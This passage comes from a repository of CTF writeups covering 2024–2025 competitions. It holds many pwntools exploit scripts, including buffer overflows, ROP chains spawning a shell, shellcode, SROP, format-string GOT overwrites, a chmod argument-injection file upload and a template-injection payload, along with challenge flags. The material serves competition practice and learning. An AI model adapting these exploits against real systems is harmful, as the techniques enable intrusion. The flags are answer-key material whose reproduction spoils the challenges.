cheatcode:\r\n", rop.chain()) 22 | 23 | p.readuntil(b"FLAG: ") 24 | 25 | print(p.readline()[:-2].decode()) # INTIGRITI{3v3ry_c7f_n33d5_50m3_50r7_0f_r372w1n} 26 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/retro2win/retro2win.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/pwn/retro2win/retro2win.zip -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/rigged_slot_machine_2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import ctypes 5 | 6 | context.log_level = "debug" 7 | elf = ELF("./rigged_slot2", checksec=False) 8 | context.binary = elf 9 | 10 | libc = ctypes.CDLL("./ubuntu:23.04.libc.so.6") 11 | 12 | #p = elf.process() 13 | #p = elf.debug(gdbscript="") 14 | p = remote("riggedslot2.ctf.intigriti.io", 1337) 15 | 16 | libc.srand(libc.time(0)) 17 | 18 | # have to play at least once... 19 | # ... and the resulting balance should be equal to 0x14684c 20 | 21 | bet = 69 22 | iVar2 = libc.rand() % 1000 23 | local_c = 0 24 | 25 | if iVar2 == 0: 26 | local_c = 10 27 | elif iVar2 < 5: 28 | local_c = 5 29 | elif iVar2 < 10: 30 | local_c = 3 31 | elif iVar2 < 0xf: 32 | local_c = 2 33 | elif iVar2 < 0x1e: 34 | local_c = 1 35 | 36 | winnings = bet * local_c - bet 37 | starting_balance = 0x14684c - winnings 38 | 39 | payload = b"" 40 | payload += b"A" * 0x14 41 | payload += p32(starting_balance) 42 | p.sendlineafter(b"Enter your name:", payload) 43 | 44 | p.sendlineafter(b"per spin): ", str(69).encode()) 45 | 46 | p.interactive() # INTIGRITI{1_w15h_17_w45_7h15_345y_1n_v3645} 47 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/rigged_slot_machine_2/rigged_slot2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/pwn/rigged_slot_machine_2/rigged_slot2.zip -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/uap/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./drone", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b start_drone_route") 11 | p = remote("uap.ctf.intigriti.io", 1340) 12 | 13 | def deploy_drone(): 14 | p.sendline(b"1") 15 | 16 | def retire_drone(): 17 | p.sendline(b"2") 18 | p.sendline(b"1") 19 | 20 | def start_drone_route(): 21 | p.sendline(b"3") 22 | p.sendline(b"1") 23 | 24 | def enter_drone_route(): 25 | p.sendline(b"4") 26 | payload = b"" 27 | payload += b"A" * 16 28 | payload += p64(elf.sym["print_drone_manual"]) 29 | p.sendline(payload) 30 | 31 | deploy_drone() 32 | retire_drone() 33 | enter_drone_route() 34 | start_drone_route() 35 | 36 | p.readuntil(b"start its route: ") 37 | print(p.readline()[:-2].decode()) # INTIGRITI{un1d3n71f13d_fly1n6_vuln3r4b1l17y} 38 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/uap/uap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/pwn/uap/uap.zip -------------------------------------------------------------------------------- /2024_11_15_1337UP24/rev/secure_bank/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./secure_bank", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("securebank.ctf.intigriti.io", 1335) 12 | 13 | p.sendline(str(0x539).encode()) 14 | 15 | p.sendline(str(0x568720).encode()) 16 | 17 | p.readuntil(b"your flag: ") 18 | 19 | print(p.readline()[:-2].decode()) # INTIGRITI{pfff7_wh47_2f4?!} 20 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/rev/secure_bank/secure_bank: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/rev/secure_bank/secure_bank -------------------------------------------------------------------------------- /2024_11_15_1337UP24/rev/secure_bank/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2446 2 | 3 | # Secure Bank (rev) 4 | 5 | Can you crack the bank? 6 | 7 | nc securebank.ctf.intigriti.io 1335 8 | 9 | ## Solution 10 | 11 | ```python 12 | #!/usr/bin/env python3 13 | 14 | from pwn import * 15 | 16 | #context.log_level = "debug" 17 | elf = ELF("./secure_bank", checksec=False) 18 | context.binary = elf 19 | 20 | #p = elf.process() 21 | #p = elf.debug(gdbscript="") 22 | p = remote("securebank.ctf.intigriti.io", 1335) 23 | 24 | p.sendline(str(0x539).encode()) 25 | 26 | p.sendline(str(0x568720).encode()) 27 | 28 | p.readuntil(b"your flag: ") 29 | 30 | print(p.readline()[:-2].decode()) # INTIGRITI{pfff7_wh47_2f4?!} 31 | ``` 32 | 33 | ## Flag 34 | `INTIGRITI{pfff7_wh47_2f4?!}` 35 | 36 | smiley 2024/11/16 37 | -------------------------------------------------------------------------------- /2024_11_22_GlacierCTF24/README.md: -------------------------------------------------------------------------------- 1 | # GlacierCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2402 4 | 5 | 33rd place 1263 points 6 | -------------------------------------------------------------------------------- /2024_11_22_GlacierCTF24/crypto/rivest_shamir_adleman_germain/rsag.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_22_GlacierCTF24/crypto/rivest_shamir_adleman_germain/rsag.tar.gz -------------------------------------------------------------------------------- /2024_11_30_WWCTF24/README.md: -------------------------------------------------------------------------------- 1 | # WWCTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2572 4 | 5 | 342nd place 145 points 6 | -------------------------------------------------------------------------------- /2024_11_30_WWCTF24/crypto/simpler_rsa/chal.py: -------------------------------------------------------------------------------- 1 | from secret import flag 2 | from Crypto.Util.number import bytes_to_long, getPrime 3 | 4 | flag = bytes_to_long(flag) 5 | p = getPrime(2048) 6 | q = getPrime(2048) 7 | c = pow(flag, p, q) # i believe this is the fancy rsa encryption? 8 | print(f'{p=}') 9 | print(f'{q=}') 10 | print(f'{c=}') 11 | -------------------------------------------------------------------------------- /2024_11_30_WWCTF24/pwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./white_rabbit", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b follow") 11 | p = remote("whiterabbit.chal.wwctf.com", 1337) 12 | 13 | p.readuntil(b"> ") 14 | leak = int(p.readline().decode(), 16) 15 | elf.address = leak - elf.sym["main"] 16 | 17 | JMP_RAX = 0x00000000000010bf 18 | # gets sets rax to &buf 19 | 20 | payload = asm(shellcraft.sh()) 21 | payload = payload.ljust(0x78, b"A") 22 | payload += p64(JMP_RAX + elf.address) 23 | p.sendline(payload) 24 | 25 | p.sendline(b"/bin/cat flag.txt") 26 | 27 | p.interactive() # wwf{jmp_d0wn_th3_r4bb1t_h0le_0caba44088} 28 | -------------------------------------------------------------------------------- /2024_11_30_WWCTF24/pwn/white_rabbit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_30_WWCTF24/pwn/white_rabbit -------------------------------------------------------------------------------- /2024_11_30_WWCTF24/pwn/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2572 2 | 3 | # White Rabbit (pwn) 4 | 5 | Just a nice easy warmup for you... 6 | 7 | nc whiterabbit.chal.wwctf.com 1337 8 | 9 | ## Solution 10 | 11 | 1) Use leak to get elf base 12 | 2) Write shellcode to the stack such that rax is equal to the start of the shellcode 13 | 3) Use jmp rax gadget / ret2reg to call shellcode 14 | 15 | ```python 16 | #!/usr/bin/env python3 17 | 18 | from pwn import * 19 | 20 | #context.log_level = "debug" 21 | elf = ELF("./white_rabbit", checksec=False) 22 | context.binary = elf 23 | 24 | #p = elf.process() 25 | #p = elf.debug(gdbscript="b follow") 26 | p = remote("whiterabbit.chal.wwctf.com", 1337) 27 | 28 | p.readuntil(b"> ") 29 | leak = int(p.readline().decode(), 16) 30 | elf.address = leak - elf.sym["main"] 31 | 32 | JMP_RAX = 0x00000000000010bf 33 | # gets sets rax to &buf 34 | 35 | payload = asm(shellcraft.sh()) 36 | payload = payload.ljust(0x78, b"A") 37 | payload += p64(JMP_RAX + elf.address) 38 | p.sendline(payload) 39 | 40 | p.sendline(b"/bin/cat flag.txt") 41 | 42 | p.interactive() # wwf{jmp_d0wn_th3_r4bb1t_h0le_0caba44088} 43 | ``` 44 | 45 | ## Flag 46 | `wwf{jmp_d0wn_th3_r4bb1t_h0le_0caba44088}` 47 | 48 | smiley 2024/12/01 49 | -------------------------------------------------------------------------------- /2024_12_13_NiteCTF24/README.md: -------------------------------------------------------------------------------- 1 | # Nite CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2461 4 | 5 | 145th place 227 points 6 | -------------------------------------------------------------------------------- /2024_12_13_NiteCTF24/pwn/mixed_signal/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./chal", checksec=True) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("mixed-signal.chals.nitectf2024.live", 1337, ssl=True) 12 | 13 | rop = ROP(elf) 14 | rop.raw(b"A" * 0x10) 15 | rop.call("vuln") 16 | rop.raw(p64(rop.find_gadget(['syscall']).address)) 17 | 18 | frame = SigreturnFrame(kernel="amd64") 19 | frame.rax = constants.SYS_sendfile 20 | frame.rdi = 1 # int out_fd / FILE_STDOUT 21 | frame.rsi = 5 # int in_fd / open("flag.txt") 22 | frame.rdx = 0 # off_t offset 23 | frame.r10 = 64 # size_t count / too much / a guess 24 | frame.rip = rop.find_gadget(['syscall']).address 25 | 26 | rop.raw(bytes(frame)) 27 | 28 | p.sendlineafter(b"pickup!\n", rop.chain()) 29 | 30 | input() 31 | 32 | p.sendline(b"A" * 14) # send 15 bytes total ~ vuln reads them and sets rax = 15/sigreturn 33 | 34 | p.interactive() # nite{b0b'5_s1gn4ls_h4v3_b33N_retUrN3D} 35 | -------------------------------------------------------------------------------- /2024_12_13_NiteCTF24/pwn/mixed_signal/handout.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_12_13_NiteCTF24/pwn/mixed_signal/handout.zip -------------------------------------------------------------------------------- /2024_12_13_NiteCTF24/pwn/print_the_gifts/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./chall_patched", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="") 13 | p = remote("print-the-gifts.chals.nitectf2024.live", 1337, ssl=True) 14 | 15 | p.sendlineafter(b">", b"%43$p") 16 | p.readuntil(b"Santa brought you a ") 17 | leak = int(p.readline().decode(), 16) 18 | libc.address = leak - 0x27305 19 | log.success(f"libc: {hex(libc.address)}") 20 | p.sendlineafter(b"y or n:\n", b"y") 21 | 22 | p.sendlineafter(b">", b"%1$p") 23 | p.readuntil(b"Santa brought you a ") 24 | leak = int(p.readline().decode(), 16) 25 | retaddr = leak + 0x21a8 26 | log.success(f"ret: {hex(retaddr)}") 27 | 28 | rop = ROP(libc) 29 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 30 | rop.raw(p64(rop.find_gadget(['ret']).address)) # stack aligning ret 31 | rop.call("system") 32 | payload = rop.chain() 33 | 34 | for i in range(len(payload)): 35 | p.sendlineafter(b"y or n:\n", b"y") 36 | p.sendlineafter(b">", fmtstr_payload(8, {retaddr + i: p8(payload[i])})) 37 | 38 | p.sendlineafter(b"y or n:\n", b"n") 39 | 40 | p.interactive() # nite{0nLy_n4ugHty_k1d5_Use_%n} 41 | -------------------------------------------------------------------------------- /2024_12_13_NiteCTF24/pwn/print_the_gifts/handout.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_12_13_NiteCTF24/pwn/print_the_gifts/handout.zip -------------------------------------------------------------------------------- /2025_01_11_UofTCTF25/README.md: -------------------------------------------------------------------------------- 1 | # UofTCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2570 4 | 5 | 481st place 300 points 6 | -------------------------------------------------------------------------------- /2025_01_11_UofTCTF25/pwn/baby_pwn/baby-pwn.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_01_11_UofTCTF25/pwn/baby_pwn/baby-pwn.zip -------------------------------------------------------------------------------- /2025_01_11_UofTCTF25/pwn/baby_pwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./baby-pwn", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("34.162.142.123", 5000) 12 | 13 | p.readuntil(b"secret: ") 14 | elf.sym["secret"] = int(p.readline().decode(), 16) 15 | 16 | payload = b"A" * 0x48 17 | payload += p64(elf.sym["secret"]) 18 | p.sendlineafter(b"Enter some text: ", payload) 19 | 20 | p.readuntil(b"flag: ") 21 | log.success(p.readline().decode()) 22 | # uoftctf{buff3r_0v3rfl0w5_4r3_51mp13_1f_y0u_kn0w_h0w_t0_d0_1t} 23 | -------------------------------------------------------------------------------- /2025_01_11_UofTCTF25/pwn/baby_pwn_2/baby-pwn-2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_01_11_UofTCTF25/pwn/baby_pwn_2/baby-pwn-2.zip -------------------------------------------------------------------------------- /2025_01_11_UofTCTF25/pwn/baby_pwn_2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./baby-pwn-2", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b vulnerable_function") 11 | p = remote("34.162.119.16", 5000) 12 | 13 | p.readuntil(b"leak: ") 14 | leak = int(p.readline().decode(), 16) 15 | 16 | shellcode = asm(""" 17 | mov rdi, 0x404008 18 | mov byte ptr [rdi], 0 19 | mov rbx, 0x68732f2f6e69622f 20 | mov rdi, 0x404000 21 | mov [rdi], rbx 22 | xor rdx, rdx 23 | xor rsi, rsi 24 | mov rax, 59 25 | syscall 26 | """) 27 | 28 | payload = shellcode.ljust(0x48, b"A") 29 | payload += p64(leak) 30 | p.sendlineafter(b"text: ", payload) 31 | 32 | p.interactive() # uoftctf{sh3llc0d3_1s_pr3tty_c00l} 33 | -------------------------------------------------------------------------------- /2025_01_18_SrdnlenCTF25/README.md: -------------------------------------------------------------------------------- 1 | # Srdnlen CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2576 4 | 5 | 266th place 60 points 6 | -------------------------------------------------------------------------------- /2025_01_24_x3CTF25/README.md: -------------------------------------------------------------------------------- 1 | # x3 CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2467 4 | 5 | 82nd place 433 points 6 | -------------------------------------------------------------------------------- /2025_01_24_x3CTF25/crypto/curved-mvm/curved-mvm.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_01_24_x3CTF25/crypto/curved-mvm/curved-mvm.tar.gz -------------------------------------------------------------------------------- /2025_01_24_x3CTF25/pwn/devnull-as-a-service/devnull-as-a-service.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_01_24_x3CTF25/pwn/devnull-as-a-service/devnull-as-a-service.tar.gz -------------------------------------------------------------------------------- /2025_01_24_x3CTF25/pwn/secure-sandbox/secure-sandbox.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_01_24_x3CTF25/pwn/secure-sandbox/secure-sandbox.tar.gz -------------------------------------------------------------------------------- /2025_01_24_x3CTF25/web/submission/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2467/ 2 | 3 | # submission (Web) 4 | php app 5 | 6 | ## Solution 7 | The bug is on 8 | ```php 9 | $shell = shell_exec('chmod 000 *'); 10 | ``` 11 | If we create a file with a name like `--help` chmod will interpret as a flag instead of a file. 12 | So we use `--reference=somefile` that replaces the 000 mode with the perms from `somefile`. 13 | 14 | The second interesting part is how we get a file that has read perms. We can't create files with `/` so no path traversal. The solution is to create a dotfile, glob won't select those. So the perms remain the same. 15 | 16 | ```python 17 | #!/usr/bin/env python3 18 | import requests 19 | 20 | REMOTE = "http://0.0.0.0:8080/" 21 | 22 | res = requests.post(REMOTE, files={"file": (".abc.txt", "ble")}) 23 | res = requests.post(REMOTE, files={"file": ("--reference=.abc.txt", "ble")}) 24 | res = requests.get(REMOTE + "/uploads/flag.txt") 25 | print(res.text) 26 | ``` 27 | 28 | ## Flag 29 | `x3c{4lw4y5_chm0d_y0ur3_f1l35_4_53cur17y}` 30 | 31 | shafouz 2025/01/26 32 | -------------------------------------------------------------------------------- /2025_02_01_BearcatCTF25/README.md: -------------------------------------------------------------------------------- 1 | # Bearcat CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2596 4 | 5 | 99th place 1600 points 6 | -------------------------------------------------------------------------------- /2025_02_01_BearcatCTF25/crypto/sqRSA/output.txt: -------------------------------------------------------------------------------- 1 | e = 2 2 | p = 8946541176074654913817717054410771331419218032593785296134838490312525894218240553305396599307555077734655624876704161811830296918000348456470769765921767 3 | q = 8932929811422923151480388874853984777290071075825590049173830382535883452482114410463430296988680318519251836647527145507992221700683938654669731212502879 4 | n = 79918824380879984230214478212107859789970760434299554608805294793725784734356035450441094355662829397276452220713697299759466084320223642049726452788651518853937184518959195516619507938497758925978032369947277889352888108330331269331130005097469138112607532759174992940835608455793923500626923539208576267193 5 | c = 17349894155329354363328734000800652637346887108866919240446747423455120556394923514564284438906649577094462846372316919957176356395706169922421515974398971844608693078173465906525109301576180786133798467234128571459625488335621909834995712400917418963473920470534646258784866422718709370743346105151573384808 6 | Traceback (most recent call last): 7 | File "sqRSA.py", line 23, in 8 | d = pow(e,-1,phi) # It always errors here?!!?! 9 | ValueError: base is not invertible for the given modulus 10 | -------------------------------------------------------------------------------- /2025_02_01_BearcatCTF25/crypto/sqRSA/sqRSA.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import getPrime, bytes_to_long 2 | from Crypto.Util.Padding import pad 3 | 4 | with open('flag.txt','rb') as fil: 5 | FLAG = fil.read() 6 | 7 | e = 2 8 | p = getPrime(512) 9 | q = getPrime(512) 10 | n = p*q 11 | 12 | print(f'{e = }') 13 | print(f'{p = }') 14 | print(f'{q = }') 15 | print(f'{n = }') 16 | 17 | m = bytes_to_long(pad(FLAG,100)) 18 | c = pow(m, e, n) 19 | 20 | print(f'{c = }') 21 | 22 | phi = (p-1)*(q-1) 23 | d = pow(e,-1,phi) # It always errors here?!!?! 24 | 25 | print(f'{phi = }') 26 | print(f'{d = }') 27 | 28 | pt = pow(c,d,n) 29 | assert pt == m 30 | -------------------------------------------------------------------------------- /2025_02_01_BearcatCTF25/pwn/calling_convention/calling_convention.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_02_01_BearcatCTF25/pwn/calling_convention/calling_convention.zip -------------------------------------------------------------------------------- /2025_02_01_BearcatCTF25/pwn/calling_convention/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./calling_convention", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("chal.bearcatctf.io", 39440) 12 | 13 | payload = b"A" * 0x10 14 | payload += p64(elf.sym["number3"]+0x8) 15 | payload += p64(elf.sym["set_key1"]) 16 | payload += p64(elf.sym["ahhhhhhhh"]+0x8) 17 | payload += p64(elf.sym["food"]) 18 | payload += p64(elf.sym["win"]+0x5) 19 | 20 | p.sendlineafter(b"> ", payload) 21 | 22 | p.readuntil(b"{") 23 | 24 | # BCCTF{R0p_Ch41ns_1b01c1c3} 25 | print("BCCTF{" + p.readuntil(b"}").decode()) 26 | -------------------------------------------------------------------------------- /2025_02_07_BITSCTF25/README.md: -------------------------------------------------------------------------------- 1 | # BITSCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2607/ 4 | 5 | 135th place 891 points 6 | -------------------------------------------------------------------------------- /2025_02_07_BITSCTF25/crypto/baby_crypto/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("chals.bitskrieg.in", 7000) 7 | 8 | p.readuntil(b"n = ") 9 | n = int(p.readline().decode()) 10 | 11 | p.readuntil(b"e = ") 12 | e = int(p.readline().decode()) 13 | 14 | p.readuntil(b"ct = ") 15 | c = int(p.readline().decode()) 16 | 17 | c2 = (pow(2, e, n) * c) % n 18 | p.sendlineafter(b"Ciphertext (int):", str(c2).encode()) 19 | 20 | p.readuntil(b"seek : ") 21 | m = int(p.readline().decode()) // 2 22 | flag = m.to_bytes(length=(m.bit_length() + 7) // 8).decode() 23 | 24 | # BITSCTF{r54_0r4acl3_h4s_g0t_t0_b3_0n3_0f_7h3_3as13st_crypt0_1n_my_0p1n10n_74b15203} 25 | print(flag) 26 | -------------------------------------------------------------------------------- /2025_02_07_BITSCTF25/pwn/baby_pwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./main", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("chals.bitskrieg.in", 6001) 12 | 13 | JMP_RAX = 0x4010ac # : jmp rax 14 | 15 | payload = asm(shellcraft.sh()).ljust(0x78, b"A") 16 | payload += p64(JMP_RAX) 17 | p.sendline(payload) 18 | 19 | p.sendline(b"/bin/cat flag.txt") 20 | 21 | # BITSCTF{w3lc0m3_70_7h3_w0rld_0f_b1n4ry_3xpl01t4t10n_ec5d9205} 22 | print(p.readuntil(b"}").decode()) 23 | -------------------------------------------------------------------------------- /2025_02_07_BITSCTF25/pwn/baby_pwn/main: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_02_07_BITSCTF25/pwn/baby_pwn/main -------------------------------------------------------------------------------- /2025_02_07_BITSCTF25/pwn/biscuits/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import ctypes 5 | import struct 6 | 7 | #context.log_level = "debug" 8 | elf = ELF("./main", checksec=False) 9 | context.binary = elf 10 | 11 | cookies = elf.read(elf.sym["cookies"], 0x500) 12 | 13 | # sha256: e7a914a33fd4f6d25057b8d48c7c5f3d55ab870ec4ee27693d6c5f3a532e6226 14 | libc = ctypes.CDLL("/lib/x86_64-linux-gnu/libc.so.6") 15 | 16 | #p = elf.process() 17 | #p = elf.debug(gdbscript="") 18 | p = remote("20.244.40.210", 6000) 19 | 20 | now = libc.time(0) 21 | libc.srand(now) 22 | 23 | for i in range(100): 24 | idx = libc.rand() % 100 25 | cookie = struct.unpack(" ") 14 | p.sendline(str((elf.got["puts"] - elf.sym["PNJs"]) >> 5).encode()) 15 | 16 | p.readuntil(b"> ") 17 | p.sendline(p64(0) + p64(elf.sym["shell"])) 18 | 19 | p.sendline(b"/bin/cat ../flag") 20 | flag = p.readuntil(b"}") 21 | print(flag.decode()) # PWNME{G0t_Ov3Rwr1t3_fTW__} 22 | -------------------------------------------------------------------------------- /2025_02_28_PwnMeCTFQuals25/pwn/got/got.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_02_28_PwnMeCTFQuals25/pwn/got/got.zip -------------------------------------------------------------------------------- /2025_03_07_KalmarCTF25/Ez ⛳ v3/writeup.md: -------------------------------------------------------------------------------- 1 | [KalmarCTF](https://ctftime.org/event/2599) 2 | 3 | # Ez ⛳ v3 (web) 4 | 5 | ## Solution 6 | This is a SSTI challenge in a config file. The vulnerable code is here: 7 | ```Caddyfile 8 | respond /headers `{{ .Req.Header | mustToPrettyJson }}` 9 | ``` 10 | 11 | Every header gets reflected and `mustToPrettyJson` expands `{{ }}`. 12 | So you just need to call ```{{ env `FLAG` }}``` neither `"'` work for the argument part but `` ` `` does. 13 | 14 | ## Flag 15 | `kalmar{4n0th3r_K4lmarCTF_An0Th3R_C4ddy_Ch4ll}` 16 | 17 | shafouz 2025/03/08 18 | -------------------------------------------------------------------------------- /2025_03_07_KalmarCTF25/README.md: -------------------------------------------------------------------------------- 1 | # KalmarCTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2599 4 | 5 | 103rd place 541 points 6 | -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/README.md: -------------------------------------------------------------------------------- 1 | # Pearl CTF 2025 Writeups 2 | 3 | https://ctftime.org/event/2647 4 | 5 | 64th place 1600 points 6 | -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/crypto/o1_punch_log/o_1__punch_log.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_07_PearlCTF25/crypto/o1_punch_log/o_1__punch_log.zip -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/crypto/stegano_ellipto_graphy/hacked.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_07_PearlCTF25/crypto/stegano_ellipto_graphy/hacked.zip -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/mr_ropot/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./chall_patched", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="") 13 | p = remote("mr---ropot.ctf.pearlctf.in", 30009) 14 | 15 | p.sendlineafter(b"Exit\n", b"1") 16 | p.sendlineafter(b"Leave a response: \n", b"%17$p") 17 | p.readuntil(b"Your Response:\n") 18 | leak = int(p.readline().decode(), 16) 19 | libc.address = leak - 0x2a1ca 20 | 21 | p.sendline(b"2") 22 | p.readuntil(b"Leave a response: \n") 23 | 24 | rop = ROP(libc) 25 | rop.raw(b"A" * 0x38) 26 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 27 | rop.raw(p64(rop.find_gadget(['ret']).address)) # stack aligning ret 28 | rop.call("system") 29 | p.sendline(rop.chain()) 30 | 31 | p.readuntil(b"recorded.\n") 32 | 33 | p.sendline(b"/bin/cat flag.txt") 34 | print(p.readuntil(b"}").decode()) # pearl{fin4lly_g0t_my_fl4g_th4nks_printf} 35 | -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/mr_ropot/mrropot.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2025_03_07_PearlCTF25/pwn/mr_ropot/mrropot.zip -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/readme_please/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./main", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("readme-please.ctf.pearlctf.in", 30039) 12 | 13 | p.sendlineafter(b"file name:", b"files/flag.txt") 14 | 15 | payload = b"A" * ((0x108 - 0x98) + 1) 16 | p.sendlineafter(b"Enter password: ", payload) 17 | 18 | p.sendlineafter(b"file name:", b"files/flag.txt") 19 | 20 | payload = b"A" 21 | p.sendlineafter(b"Enter password: ", payload) 22 | 23 | print(p.readuntil(b"}").decode()) # pearl{f1l3_d3script0rs_4r3_c00l} 24 | -------------------------------------------------------------------------------- /2025_03_07_PearlCTF25/pwn/readme_please/readme_src.zip: 